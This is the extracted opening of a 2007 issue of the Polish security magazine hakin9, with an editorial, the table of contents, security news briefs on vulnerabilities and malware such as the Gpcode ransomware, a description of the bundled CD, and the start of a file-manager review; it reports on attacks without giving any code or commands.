Narzędzia. Początki. Atak. hakin9

Wielkość: px
Rozpocząć pokaz od strony:

Download "Narzędzia. Początki. Atak. hakin9"

Transkrypt

1

2

3

4 hakin9 Witam! Terminy haker, cracker kojarzą się zwykłym ludziom raczej z pojęciem cyberprzestępcy, jednak bardziej wtajemniczeni wiedzą, że te dwa typy różnią się od siebie. Jak zapewne Państwo wiedzą, hakerzy to osoby, które szukają luk w oprogramowaniu komputerowym, a później wykorzystują taką wiedzę, aby uzyskać dostęp do zabezpieczonych zasobów. Natomiast cracker to osoba zajmująca się łamaniem zabezpieczeń komputerowych. Hakerzy, skupieni w społeczności hakerskiej, używają terminu cracker dla odróżnienia się od przestępców; z kolei crackerzy terminu haker używają na określenie włamywaczy sieciowych. Obie wspomniane grupy ludzi działają z różnych pobudek. Jedni włamują się do serwisów komputerowych, aby wykryć luki, a potem szantażują właścicieli portali. A drudzy pracują teraz dla firm takich jak TrendMicro i pomagają im stworzyć szczepionki przeciwko nowym zagrożeniom, jakie stawia przed nami Sieć. Motywem działań hakerów i crackerów jest także chęć pozyskania rozgłosu i wywołania ogólnego chaosu. Istnieje swoisty podział hakerów pod względem etyki: black hat (hakerzy działający na pograniczu lub poza granicami prawa), white hat (hakerzy działający w imię prawa, nie chcący popełnić szkód), grey hat (grupa znajdująca się pomiędzy dwiema omawianymi wyżej kategoriami). My, jako Redakcja, mamy do czynienia ze wszystkimi omawianymi grupami hakerów, jednak cenimy tych z grupy white hat. Nasi Czytelnicy bardzo dobrze zdają sobie z tego sprawę. Mieliśmy wiele ciekawych artykułów poświęconych wykrywaniu luk w takich portalach, jak Allegro, Onet czy mbank. Umieszczaliśmy je w celu tylko i wyłącznie informacyjnym, aby uczulić omawiane serwisy na opisane zagrożenia. Mam nadzieję, że zamieszczane przez nas artykuły pomogły już niejednemu Czytelnikowi, dlatego chciałam gorąco polecić artykuł Bartosza Kalinowskiego Obroń swój komputer przed hakerem!!! Bartek w swoim tekście pokazuje przeróżne zachowania systemu świadczące o obecności hakera. Godnym przeczytania artykułem jest pozycja kilku autorów pt. Luki w Voip. W październikowym hakin9 przedstawiamy wywiad z bardzo interesującym człowiekiem, jakim jest komisarz Zbigniew Urbański. Z rozmowy nasi Czytelnicy dowiedzą się co nieco o samym bohaterze, a także o piractwie komputerowym widzianym okiem policjanta i organów ścigania. W numerze, który mają Państwo w rękach, jak zwykle nie zabraknie wielu ciekawych programów, na CD znajdują się m. in. G DATA Antivirus, F-Secure Internet Security oraz dwa nowe tutoriale. Życzę przyjemnej lektury! Katarzyna Juszczyńska W skrócie 6 Mateusz Stępień Przedstawiamy garść najciekawszych wiadomości ze świata bezpieczeństwa systemów informatycznych i nie tylko. Zawartość CD 10 Prezentujemy zawartość i sposób działania najnowszej wersji naszej sztandarowej dystrybucji hakin9.live Narzędzia Recenzja MindMap 5 Professional 12 Recenzja Directory Opus 9 13 Początki Ataki SQL Injection w praktyce 14 Dawid Gołuński Dawid w swoim artykule mówi na czym polegają ataki SQL Injection oraz jakie niosą zagrożenia. Pokaże krok po kroku techniki używane podczas ataku oraz metody obrony. Atak Luki w VoIP 26 Tomasz Piotrowski, Szczepan Wójcik, Mikołaj Wiśniewski, Wojciech Mazurczyk Autorzy przedstawią w jaki sposób zabezpieczyć systemy VoIP, na co zwracać uwagę przy kupowaniu i wdrażaniu tych systemów oraz jakie luki bezpieczeństwa znajdują się w systemie Asterisk. Atak hakera na Twój komputer 36 Bartosz Kalinowski Bartek w swoim artykule scharakteryzuje system, w którym można dostrzec obecność intruza i jakie zostawia po sobie ślady. Łamanie klucza rejestracji Windows XP 48 Rafał Podsiadły Rafał opisał w swoim artykule jak zaczyna życie najpopularniejszy system operacyjny. 4 hakin9 Nr 10/2007

5 Obrona Opera mechanizmy ochrony przed oszustwami 56 Marcin Kopeć Marcin w swoim tekście przedstawia w jaki sposób działa mechanizm ochrony przed oszustwami zaimplementowanymi w przeglądarce internetowej Opera. Konfiguracja serwera ISS dla ASP.NET z protokołem SSL 62 Sławomir Orłowski, Jacek Matulewski Sławek i Jacek przybliżą Czytelnikom temat konfiguracji serwera ISS do obsługi stron ASP.NET z uwierzytelnieniem SSL. Bezpieczna firma Audyt systemów informatycznych 68 Wojciech Malec Wojtek postara się wyjaśnić termin audytu informatycznego oraz przedstawi najważniejsze organizacje zawodowe właściwe dla audytu informatycznego. Księgozbiór 72 Recenzujemy książki: Kryptografia w Javie. Od podstaw oraz Apache. Zabezpieczenia aplikacji i serwerów WWW. Wywiad Wywiad z komisarzem Zbigniewem Urbańskim 74 Katarzyna Juszczyńska, Robert Gontarski Komisarz Zbigniew Urbański ekspert do spraw przestępczości komputerowej. Klub Techniczny Trend Micro dla MSP 77 Felieton Druga strona medalu 78 Patryk Krawaczyński Zapowiedzi 82 Zapowiedzi artykułów, które znajdą się w następnym wydaniu naszego pisma. jest wydawany przez Software Wydawnictwo Sp. z o.o. Dyrektor: Sylwia Pogroszewska Redaktor naczelna: Martyna Żaczek Redaktorzy prowadzący: Katarzyna Juszczyńska Robert Gontarski Wyróżnieni betatesterzy: Przemysław Prytek, Paweł Lisowski Opracowanie CD: Rafał Kwaśny Kierownik produkcji: Marta Kurpiewska Skład i łamanie: Artur Wieczorek Okładka: Agnieszka Marchocka Dział reklamy: Prenumerata: Marzena Dmowska Adres korespondencyjny: Software Wydawnictwo Sp. z o.o., ul. Bokserska 1, Warszawa, Polska Tel , Fax Osoby zainteresowane współpracą prosimy o kontakt: Jeżeli jesteś zainteresowany zakupem licencji na wydawanie naszych pism prosimy o kontakt: Monika Nowicka tel.: +48 (22) fax: +48 (22) Druk: 101 Studio, Firma Tęgi Redakcja dokłada wszelkich starań, by publikowane w piśmie i na towarzyszących mu nośnikach informacje i programy były poprawne, jednakże nie bierze odpowiedzialności za efekty wykorzystania ich; nie gwarantuje także poprawnego działania programów shareware, freeware i public domain. Uszkodzone podczas wysyłki płyty wymienia redakcja. Wszystkie znaki firmowe zawarte w piśmie są własnością odpowiednich firm i zostały użyte wyłącznie w celach informacyjnych. Do tworzenia wykresów i diagramów wykorzystano program firmy Płytę CD dołączoną do magazynu przetestowano programem AntiVirenKit firmy G DATA Software Sp. z o.o. Redakcja używa systemu automatycznego składu UWAGA! Sprzedaż aktualnych lub archiwalnych numerów pisma w cenie innej niż wydrukowana na okładce bez zgody wydawcy jest działaniem na jego szkodę i skutkuje odpowiedzialnością sądową. hakin9 ukazuje się w następujących krajach: Hiszpanii, Argentynie, Portugalii, Francji, Belgii, Luksemburgu, Kanadzie, Maroko, Niemczech, Austrii, Szwajcarii, Polsce, Czechach, Słowacji. Prowadzimy również sprzedaż kioskową w innych krajach europejskich. Magazyn hakin9 wydawany jest w 7 wersjach językowych: PL ES CZ EN IT FR DE Nakład wersji polskiej egz. UWAGA! Techniki prezentowane w artykułach mogą być używane jedynie we własnych sieciach lokalnych. Redakcja nie ponosi odpowiedzialności za niewłaściwe użycie prezentowanych technik ani spowodowaną tym utratę danych. hakin9 Nr 2/2006 5

6 W skrócie Błąd w Xvid W popularnym zestawie kodeków wideo Xvid wykryto lukę, która umożliwia atakującemu całkowite przejęcie kontroli nad atakowanym komputerem. Gdy użytkownik komputera uruchomi odpowiednio spreparowany plik.avi dochodzi do ataku za pomocą aplikacji, która odwołuje się do programu Xvid. Błąd występuje w pliku mbcoding.c w funkcjach get_intra_ block, get_inter_block_h263 oraz get_inter_block_mpeg. Podatne są na niego zarówno aplikacje dla systemu Windows, jak i Linux. Xvid to kodek obrazu zgodny z ISO MPEG-4, wydany na licencji GNU GPL. Jego nazwa jest celowym anagramem nazwy kodeka DivX, który jest zamkniętą implementacją tego samego standardu. Haker odcina dostęp do kont owych na UK2.net... Domena internetowa UK2.net stała się celem ataku hakera, pozostawiając tym samym internautów czasowo odciętych od dostępu do i. Internauci pojawiający się na stronie 12 lipca ujrzeli przeobrażoną witrynę. Najwidoczniej była to sprawka islamskiego hakera. Wiele osób zwróciło się do nas w tej sprawie z informacjami, że nie są w stanie wejść na swoje konta mówią pracownicy portalu. Doświadczenia czytelnika Andy ego są typowe: UK2 była (dla mnie) nieosiągalna od godziny 6:00 tego ranka, gdy nie działał przez POP3. Próbowałem jeszcze raz o 12 w południe za pomocą POP3 i strony internetowej, ale bez rezultatu, oba nie działały jedyne co mogły mi zaoferować to zmienioną stronkę. Wcześniej też miałem dużo problemów z UK2. Moje konta były niestabilne przez 3 tygodnie pod koniec maja i na początku czerwca. Czasami działało, ale zazwyczaj odmawiało posłuszeństwa. Firma oficjalnie ogłosiła, że w godzinach porannych we czwartek stała się ofiarą ataku hakerskiego. Atak uniemożliwił internautom wejście na stronę UK2 i na skrzynkę ową. UK.net na swoich stronach napisał, że ta kwestia została już rozwiązana przez specjalistów. Pomimo tego, jak dodali, niektórzy użytkownicy mogli mieć problemy z dostępem do serwisu, dopóki DNS nie naniesie zmian. Kaspersky Anti-Virus na liście 100 najlepszych produktów IT 2007 Kaspersky Lab, producent rozwiązań służących do ochrony danych, informuje o otrzymaniu wyjątkowego wyróżnienia: program Kaspersky Anti-Virus 6.0 znalazł się na liście 100 najlepszych produktów IT 2007 opublikowanej przez PC World. Amerykański magazyn PC World kolejny raz już w okresie wakacyjnym opublikował listę 100 najlepszych, najnowocześniejszych oraz najbardziej docenionych przez konsumentów produktów z branży informatycznej i internetowej. Zestawienie obejmuje wiele różnorodnych produktów (sprzęt, oprogramowanie, serwisy oraz usługi internetowe). Na 55 miejscu listy, jako jedyny komercyjny program antywirusowy uwzględniony w zestawieniu, znalazł się Kaspersky Anti-Virus. Pełna lista dostępna jest pod adresem: ticle/ id, page,13 /ar ticle.html Kaspersky Anti-Virus to program Fake stron Apple antywirusowy firmy Kaspersky Lab, zapewniający ochronę przed zagrożeniami płynącymi z sieci Internet (wirusy, robaki, konie trojańskie, adware, spyware). Kaspersky Anti-Virus współpracuje z systemami Windows 98/Me/XP, NT Workstation oraz Windows 2000 Professional. Specjaliści z Sunbelt odkryli nowego trojana, który próbuje wyciągać pieniądze od użytkowników poprzez fikcyjną sprzedaż najnowszego dziecka koncernu Apple, iphone. Eksperci z Sunbelt twierdzą, że trojan mógł powstać na zamówienie przestępców, a w dodatku jest słabo wykrywalny przez aplikacje antywirusowe. Podczas odwiedzin google.com lub yahoo.com wirus pokazuje na ekranie okienka popup, które zawierają między innymi informację: supported by Google oraz supported by Yahoo. Kliknięcie w reklamę w zainfekowanym systemie kończy się przekierowaniem na specjalnie przygotowaną wersję strony, gdzie internauta może wypełnić formularz zamówienia i dokonać przelewu gdzieś do banku na Łotwie zamiast na konta Apple. iphone to urządzenie posiadające funkcje telefonu komórkowego, odtwarzacza MP3 (ipod) i komunikatora internetowego, jak nazwała tę funkcję Apple Inc. Nowatorskim rozwiązaniem w urządzeniu była rezygnacja z jakiejkolwiek klawiatury zamiast tego iphone posiada ekran dotykowy, przy którym użyto technologię o nazwie Multi-Touch: zamiast korzystać z rysika, wszystko wciska się jednym lub kilkoma palcami dłoni. iphone działa na zoptymalizowanej wersji Mac OS X. System zajmuje około 700 MB. Bateria w iphonie nie powinna być wymieniana przez użytkownika. Według producenta, czas pracy baterii to: do 24 godzin słuchania muzyki, do 8 godzin rozmowy, do 7 godzin oglądania filmów, do 6 godzin przeglądania Internetu, bądź do 250 godzin czuwania, jednak czas ten zależy od różnych ustawień. 6 hakin9 Nr 10/2007

7 Mateusz Stępień Początek ery petaflopsowych komputerów Elektroniczny gigant IBM zaprezentował najszybszy komputer świata Blue Gene/P. który jest sto tysięcy razy szybszy niż przeciętny komputer biurowy. Prędkość superkomputera to mniej więcej jeden petaflop (1 petaflop = 1,000 teraflopów = 1,000,000 gigaflopów), czyli tysiąc bilionów operacji na sekundę. Taką sprawność zapewnia rdzeni procesora IBM PowerPC 450, z których każdy jest taktowany zegarem o częstotliwości 850 MHz. Cztery rdzenie tworzą jeden procesor. System operacyjny superkomputera bazuje na Linuksie, a aplikacje można tworzyć w standardowych językach programowania, takich jak Fortran, C czy C++. Za pierwszy superkomputer uznaje się CDC Wirus szantażysta 6600, który powstał w 1963 roku według projektu i pod ścisłym nadzorem Seymoura Craya. Maszyna wykonywała 3 miliony operacji na sekundę. Był to pierwszy komputer, w którym zastosowano tranzystory krzemowe oraz nowatorską technikę chłodzenia podzespołów freonem. Najpotężniejszą maszyną w Polsce jest klaster HOLK. Komputer, znajdujący się w Centrum Informatycznym Trójmiejskiej Akademickiej Sieci Komputerowej, został zbudowany w 2003 roku i wówczas znajdował się na 231 pozycji TOP500. Maszyna zarządzana przez system GNU/Linux (dystrybucja Debian), której teoretyczna moc obliczeniowa sięga 1.5 TFLOPS, jest wykorzystywana do obliczeń naukowych. Specjaliści z Kaspersky Lab wykryli nową odmianę wirusa Gpcode, który szyfruje pliki na dyskach ofiar i żąda okupu w wysokości 300 dolarów za przywrócenie do nich dostępu. Robak Virus.Win32.Gpcode do szyfrowania plików wykorzystuje złożony algorytm informując że jest to RSA-4096, co nie jest prawdą, bo jak ustalili eksperci z Kaspersky Lab jest to algorytm RC4. Autorami wirusa najprawdopodobniej są Rosjanie. Na zaatakowanym komputerze wirus umieszcza również plik o nazwie read_me.txt, w którym umieszczona jest taka oto informacja: Hello, your files are encrypted with RSA-4096 algorithm (http:// en.wikipedia.org/wiki/rsa). You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300. To buy our software please contact us at: and provide us your personal code -xxxxxxxxx. After successful purchase we will send your decrypting tool, and your private information will be deleted from our system. If you will not contact us until 07/15/2007 your private information will be shared and you will lost all your data. Glamorous team. Witaj, twoje pliki zostały zaszyfrowane przy użyciu algorytmu RSA-4096 (http://en.wikipedia.org/ wiki/rsa). Bez naszego oprogramowania odszyfrowanie tych plików zajmie ci przynajmniej kilka lat. Od trzech miesięcy twoje poufne informacje były gromadzone i wysyłane do nas. Aby odszyfrować swoje dane, musisz kupić nasze oprogramowanie. Jego cena to $300. W celu dokonania zakupu skontaktuj się z nami pod adresem i załącz swój osobisty kod - xxxxxxxxx. Po dokonaniu zakupu, prześlemy ci narzędzie deszyfrujące a twoje poufne informacje zostaną skasowane z naszego systemu. Jeżeli nie skontaktujesz się z nami do 15 lipca 2007 twoje poufne informacje zostaną udostępnione w Internecie. Glamorous team. iphone częściowo złamany Jon Lech Johansen, czyli sławny DVD Jon, złamał część zabezpieczeń nowego iphone a. Ujawnił sposób aktywacji nowego telefonu firmy Apple bez potrzeby wiązania się umową z jedynym w Stanach Zjednoczonych autoryzowanym dostawcą AT&T. Jon napisał specjalny program, który imituje zachowanie serwera odpowiadającego za aktywację urządzeń przez firmę Apple. Kompletną instrukcję przeprowadzenia procesu aktywacji i kod źródłowy programu zastępującego serwer aktywujący telefony można znaleźć w blogu DVD Jona. Jon Lech Johansen jest norweskim programistą zaangażowanym w rozkodowywanie systemów zabezpieczeń. Jego ojciec jest Norwegiem, a matka Polką. Uczestniczył w stworzeniu programu deszyfrującego zakodowane filmy DVD DeCSS. Jon stworzył także zestaw otwartych sterowników do odtwarzacza MP3 Jaz- Piper (OpenJaz, 2001) i program QTFairUse do odczytywania zakodowanych strumieni AAC (2003). W 2004 r. dołączył do zespołu programistów VideoLAN, dla którego opracował wtyczkę do odtwarzania mediów zabezpieczonych systemem FairPlay oraz sposób odtwarzania materiałów zakodowanych w WMV9. Zdołał też ominąć zabezpieczenia protokołu AirPort Express firmy Apple i algorytmu ochrony plików NSC z Windows Media Playera. hakin9 Nr 10/2007 7

8 W skrócie IE7 podatny na spoofing Firma Secunia poinformowała o wykrytej przez Michała Zalewskiego luce w przeglądarce Microsoftu Internet Exlporer 7. Błąd występuje w metodzie document.open() i pozwala na sfałszowanie źródłowego adresu IP nawet w przypadku, gdy ręcznie wpiszemy adres nowej strony. (tzw. spoofing) Michał Zalewski, stwierdził: lukę można wykorzystać tylko wówczas, gdy jest uruchomiony JavaScript. Do tej pory Microsoft nie przygotował łatki na ten błąd, ewentualnego występowania luki nie sprawdzano w przeglądarce Internet Explorer 6. Internet Explorer w wersji Windows, rozwijany jest na bazie kodu Mosaic zakupionego od firmy Spyglass. Program został oficjalnie zaprezentowany 23 sierpnia 1995 roku. Najważniejsze nowości w wersji IE 7: przeglądanie stron w kartach, narzędzia wykorzystujące RSS i Atom, obsługa przezroczystych grafik PNG, ulepszona architektura, mająca lepiej chronić przed wirusami i robakami. Włamanie na brytyjski serwis firmy Microsoft Wykryto podatność na atak typu SQL Injection na brytyjskiej stronie Microsoftu. Dziura umożliwiała m. in. wyciągnięcie listy użytkowników i ich zakodowanych haseł, a także modyfikowanie tabel. Podatność na atak wykryto na stronie przeznaczonej dla partnerów. Haker z Arabii Saudyjskiej ukrywający się pod pseudonimem remoter umieścił w Internecie nagranie z włamania, które niestety jest już niedostępne. Po bardziej wnikliwej analizie wykazano, że serwis jest również podatny na atak typu Cross Site Scripting. Atak typu SQL Injection polega na takiej manipulacji aplikacją komunikującą się z bazą danych, aby ta umożliwiła atakującemu uzyskanie dostępu lub modyfikację danych, do których nie posiada on uprawnień. W praktyce polega to na wykorzystaniu interfejsu użytkownika (adresu URL, formularza HTML/XML, okna dialogowego itp.) do wprowadzenia do aplikacji spreparowanego ciągu znaków. Gadający koń trojański Sieci odkryto nowego niezwykle groźnego i złośliwego W konia trojańskiego o nazwie BotVoice.A. Szkodnik jest o tyle nietypowy, że po przeniknięciu do systemu niszczy dane znajdujące się na dysku twardym i informuje werbalnie użytkownika o szkodach, które spowodował (wykorzystując w tym celu wbudowany do Windows syntezator mowy): Zostałeś zarażony. Powtarzam, zostałeś zarażony, a twoje pliki systemowe zostały skasowane. Przykro mi. Miłego dnia i do widzenia. (You have been infected I repeat you have been infected and your system files have been deleted. Sorry. Have a nice day and bye bye). BotVoice.A potrafi m. in. zablokować dostęp do plików BAT, COM, EXE, MP3 oraz do Menedżera Zadań i Edytora Rejestru. Szkodliwy kod atakuje systemy Windows 95 i nowsze. Nie zagraża natomiast Windows Vista. Trojan nie potrafi samodzielnie zainfekować komputera, konieczna jest interakcja ze strony użytkownika. Rozprzestrzenia się głównie za pośrednictwem wymiennych nośników danych lub sieci komputerowych. BotVoice.A wykryty został przez specjalistów z firmy Panda Software. BotVoice.A został stworzony tylko po to, by niszczyć od lat nie widziałem tak doskonałego przykładu bezmyślnego wandalizmu komentuje Roger Thompson, specjalista z firmy Exploit Prevention Labs. Kolejnych 7 polskich studentów na praktykach w Redmond Microsoft poinformował, że siedmiu studentów z polskich uczelni technicznych będzie reprezentować nasz kraj podczas tegorocznej edycji praktyk, które co roku odbywają się w centrali firmy Microsoft Corporation w Redmond. Do tegorocznej edycji EMEA Internship Program polskie uczelnie zgłosiły 129 kandydatów, z których wybrano siedmiu uczestników. Jeden z nich weźmie udział w programie po raz drugi. Rozmowy z kandydatami po raz kolejny odbyły się w Warszawie. Jest to rezultat wysokiego poziomu reprezentowanego przez studentów pochodzących z Polski, a co za tym idzie, dużej liczby potencjalnych praktykantów. Praktyki prowadzone przez Microsoft w centrali w Redmond pozwalają studentom na udział w rzeczywistych projektach prowadzonych w korporacji, często kluczowych dla firmy oraz ważnych dla branży IT. Udział w programie to dla większości uczestników także pierwszy krok do zdobycia zatrudnienia w firmie Microsoft. Po zakończeniu stażu studenci mają rok na skończenie studiów oraz powrót do Redmond. Do tegorocznej edycji EMEA Internship Program zakwalifikowali się z Polski: Sylwia Kopczyńska, Piotr Kułaga, Łukasz Tomczyk, Paweł Baszuro, Piotr Findeisen, Mike Kaczmarczyk oraz Szymon Wasik z Politechniki Poznańskiej, Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie, Politechniki Częstochowskiej, Wyższej Informatycznej Szkoły Zawodowej w Gorzowie Wielkopolskim oraz Uniwersytetu Warszawskiego. Udział w programie EMEA Internship Microsoftu jest dla mnie doskonałą okazją do zdobycia doświadczenia w międzynarodowej korporacji. Wyjazd ten pozwoli mi zobaczyć, jak wygląda praca w zespole zajmującym się dużymi projektami informatycznymi, a w przyszłości mam nadzieję ułatwi mi również zdobycie ciekawego i pełnego wyzwań zatrudnienia. Jestem przekonany, że pobyt w kampusie Microsoft w Redmond będzie jednocześnie okazją do dobrej zabawy i poznania ciekawych ludzi z całego świata powiedział Piotr Kułaga, student Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie. 8 hakin9 Nr 10/2007

9 Mateusz Stępień Dziurawy Adobe Flash Player i Photoshop Atak na Pentagon Hakerzy przeprowadzili skuteczny atak na systemy komputerowe amerykańskiego ministerstwa obrony. Pentagon został zmuszony do wyłączenia części swojego systemu pocztowego, przez co prawie półtora tysiąca pracowników straciło dostęp do swoich kont owych. Zdecydowaliśmy się na wyłączenie części systemu pocztowego OSD w związku z wykryciem włamania do naszej infrastruktury. Nasi specjaliści wykonali wszelkie niezbędne działania dotyczące zabezpieczenia systemu oraz śladów włamania spodziewam się, że wszystkie systemy wrócą online już wkrótce mówił na konferencji prasowej Robert Gates, rzecznik prasowy Pentagonu. Przedstawiciele Departamentu Obrony nie Producent oprogramowania multimedialnego, firma Adobe Systems wydała poprawki dla swoich aplikacji: Flash Playera i Photoshopa (CS2/CS3). Poprawki te naprawiają usterki bezpieczeństwa, których potencjalny intruz może użyć do wykonania dowolnego kodu. W Adobe Flash Player wykryto luki, które m. in. umożliwiają napastnikowi zdalne przejęcie pełnej kontroli nad systemem. Podatności występują w aplikacjach: Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych. Zaktualizowana wersja Flash Playera jest dostępna (podobnie jak łatki dla wcześniejszych wydań odtwarzacza) pod adresem: W oprogramowaniu Photoshop CS2 i CS3 wykryto błąd, który pozwala na wstrzyknięcie i uruchomienie dowolnego kodu. Istotą tego błędu jest niepoprawne przetwarzanie plików zapisanych w formatach PNG, DIB, RLE i BMP. Błąd w Photoshopie wykrył specjalista ukrywający się pod pseudonimem Marsu. Adobe Systems to amerykańska firma z siedzibą w San José w Kalifornii, znana z projektowania szeroko rozumianego oprogramowania graficznego dla systemów Mac OS i Windows. Przedsiębiorstwo założyli w 1982 r. byli pracownicy Xerox PARC, John Warnock i Charles Geschke. Najważniejsze produkty firmy to: Adobe Acrobat, Adobe After Effects, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, Adobe Premiere, Adobe Reader. ujawnili żadnych innych informacji na temat włamania potwierdzili jedynie: Atak ten nie miał właściwie żadnego wpływu na nasze działania napastnik nie uzyskał dostępu do żadnych tajnych informacji. Nasza infrastruktura informatyczna jest wciąż atakowana, mamy więc doświadczenie w postępowaniu w takich sytuacjach. Ruszyła internetowa aukcja exploitów Jedna z firm szwajcarskich uruchomiła stronę aukcyjną, na której wystawiane na sprzedaż będą informacje o nowych lukach w oprogramowaniu. Witryna nosi nazwę WabiSabiLabi i jej głównym celem jest nakłonienie specjalistów, którzy znaleźli luki, by sprzedawali je firmom zainteresowanym w ich załataniu, a nie cyberprzestępcom. Zdecydowaliśmy się na uruchomienie serwisu umożliwiającego sprzedawanie wyników badań nad bezpieczeństwem, ponieważ wielu specjalistów odkrywa luki, ale niewielu z nich informuje o tym odpowiednich ludzi. Naszym celem jest umożliwienie im uzyskania uczciwej ceny za pracę i jednoczesne zapewnienie, że nie będą musieli oddawać jej wyników za darmo ani sprzedawać cyberprzestępcom mówi Herman Zampariolo, szef firmy. Pomysł szwajcarskiej firmy ma zarówno zwolenników, jak i przeciwników. Do krytykantów należy Gunter Ollman, dyrektor IBM Internet Security Systems: To przypomina witryny, które istnieją na czarnym rynku. Będziemy mieli do czynienia z tymi samymi ludźmi, którzy szukają dziur, by je sprzedać. To dla nich po prostu dodatkowy kanał dystrybucji. Korzystanie z serwisu będzie darmowe przez sześć miesięcy, potem będą pobierane opłaty w wysokości 10% kwoty sprzedaży. Nowa odmiana virusa Gpcode W Sieci pojawiła się nowa odmiana wirusa Gpcode, która to po zarażeniu komputera użytkownika szyfruje pliki na dyskach. Wirus za odszyfrowanie domaga się zapłaty 300 dolarów i informuje, że używa algorytmu szyfrującego RSA-4096, co nie jest prawdą. Na dysku pojawia się także plik tekstowy read_me.txt w którym możemy przeczytać Hello, your files are encrypted with RSA-4096 algorithm (http://en.wikipedia.org/wiki/rsa). You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300 (...) Specjaliści z firmy Kaspersky po analizach doszli do tego, że wykorzystywany jest tu algorytm RC4. Najnowsze oprogramowanie firmy Kaspersky już radzi sobie z wirusem i odszyfrowuje pliki. Najprawdopodobniej autorami wirusa są Rosjanie. hakin9 Nr 10/2007 9

10 hakin9.live Zawartość CD Na dołączonej do pisma płycie znajduje się hakin9.live (h9l) w wersji on BackTrack2.0, zawierająca przydatne narzędzia, dokumentację, tutoriale i materiały dodatkowe do artykłów. Aby zacząć pracę z hakin9.live, wystarczy uruchomić komputer z CD. Po uruchomieniu systemu możemy zalogować sie jako użytkownik hakin9 bez podawania hasła. Materiały dodatkowe Tutorial podstawy języka Python, Tutorial wstęp do free Pascal. Programy: G DATA AntiVirus 2007, F-secure Internet Security 2007, AVG Anty-Rootkit, AVG Antywirus 7.5, CureIT. G DATA AntiVirus 2007 Aktywacja od 5 października. G DATA AntiVirus 2007 umacnia wiodącą pozycję w czołówce programów antywirusowych w dziedzinie wykrywalności wirusów. Dzięki zoptymalizowanej technologii podwójnego skanowania połączonej z mechanizmem OutbreakShield, nowy antywirus wykrywa wirusy jeszcze dokładniej i szybciej, zużywając jednocześnie znacznie mniej zasobów systemowych. G DATA AntiVirus 2007 usuwa złośliwe oprogramowanie typu spyware, adware, riskware, a także wirusy, trojany, robaki. Gwarantuje jeszcze skuteczniejszą ochronę przed hakerami. Program przeznaczony dla użytkowników wymagających, potrzebujących prostej i szybkiej ochrony komputera. Dzięki zastosowaniu dwóch silników skanujących oraz trzech skanerów poczty Twoje dane są w 100% bezpieczne. To jednak początek długiej listy zalet, docenianych przez specjalistów na całym świecie. F-secure Internet Security 2007 Zestaw zabezpieczeń przeznaczony dla użytkowników domowych i małych firm. W skład pakietu wchodzą następujące moduły, takie jak: ochrona antywirusowa, antispyware, firewall, ochrona poczty, antispam, ochrona przed intruzami IDS oraz moduły kontroli rodzicielskiej i kontroli aplikacji. Narzędzie chroni system poza standardowymi wirusami i robakami także przed oprogramowaniem szpiegującym i rootkitami, co zapewnia pełną ochronę komputera. W wersji 2007 Internet Security posiada swoiste laboratorium wykrywania wirusów, wykorzystując technologię DeepGuard. AVG Anti-Rootkit AVG Anti-Rootkit jest silnym narzędziem z technologią state-of-art do wykrywania i usuwania rootkit'ów. Rootkit'y służą do ukrywania złośliwych objektów na komputerze takich jak trojany czy keyloggery. Jeżeli włamywacz wykorzystuje technologię rootkit do tego, aby ukryć swoją obecność, wtedy bardzo ciężko jest znaleźć złośliwe oprogramowanie na komputerze. AVG Anti-Rootkit daje Ci możliwość znalezienia i usunięcia rootkita oraz zdemaskowania złodzieja, którego ukrywa rootkit. Interface jest przejrzysty i łatwy w obsłudze. Oprogramowanie zapewnia szybkie i efektywne wykrywanie nawet obiektów NTFS-ADS AVG Antywirus 7.5 Najnowsze wydanie narzędzia przeciwko wirusom firmy Grisoft do użytku domowego na pojedyńczym komputerze. Zapewnia najwyższy poziom wykrywalności dlatego miliony użytkowników na świecie powierzyło bezpieczeństwo swoich komputerów właśnie temu produktowi. Poruszanie się po oprogramowaniu jest intuicyjne i proste, samo narzędzie nie potrzebuje dużych zasobów komputera i nie zwalnia jego pracy. AVG Anti-Virus umożliwia przeprowadzanie automatycznych aktualizacji, oraz zapewnia ochrone w czasie rzeczywistym poprzez nadzorowanie dzialających programów czy otwieranych plików. CureIT Jest to darmowy anti-virus i anti-spyware bazujący na silniku skanera Dr.Web Anti-virus, który pomoże Ci szybko przeskanować i wyleczyć komputer jeśli będzie to konieczne. Obsługuje stacje robocze wykorzystujące takie systemy operacyjne jak MS Windows 95OSR2/ 98/Me/ NT 4.0/2000/XP/2003Vista. Interface skanera jest przystosowywany odpowiednio do wykrytego języka na danym komputerze, jeżeli lokalny język nie zostanie wykryty domyślnie ustawiany jest angielski. Narzędzie zawiera aktualną bazę antywirusów na czas pobrania, a aktualizacje są przeprowadzane, aż dwa razy na godzinę. Aby korzystać z najświeższej bazy wirusów należy ściągnąć ostatnia wersję Dr. Web CureIt, ponieważ narzędzie nie zawiera bezpośredniej aktualizacji. Serdeczne podziękowania dla firmy TTS Company za udostępnienie programu EagleEyeOS Professional Severe w numerze hakin9 8/ hakin9 Nr 10/2007

11 Jeśli nie możesz odczytać zawartości płyty CD, a nie jest ona uszkodzona mechanicznie, sprawdź ją na co najmniej dwóch napędach CD. W razie problemów z płytą, proszę napisać pod adres:

12 Directory Opus 9 Narzędzia Producent: GP Software System: Windows 2000/XP/2003/Windows Vista Typ: Menadżer plików Strona producenta: Strona dystrybutora: Ocena: 5/5 Directory Opus (DOpus) to flagowy produkt firmy GPSoftware. DOpus jest menadżerem plików przeznaczonym pod Windows a (także pod najnowszą Vistę). Jego pierwsze wersje powstały na początku lat dziewięćdziesiątych. Najnowsza wersja (9) dodaje wiele nowych funkcji, przez co program jest lepszy. Jego układ oparty jest na panelach, podobnie jak Total Commandera (TC), jednak DOpus posiada znacznie większe możliwości. Pierwszą bardzo dużą zaletą jest podział na style, zakładki i panele. Interfejs jest dowolnie konfigurowalny możemy otworzyć tyle paneli, ile tylko chcemy, w jakimkolwiek położeniu (horyzontalnie i wertykalnie). Style natomiast są to predefiniowane układy paneli podwójny poziomy, pionowy, eksplorator, przezrocze, obrazy czy pojedynczy każdy z nich posiada inne przeznaczenie. Korzystanie z nich to sama przyjemność, gdyż mamy możliwość innego prezentowania 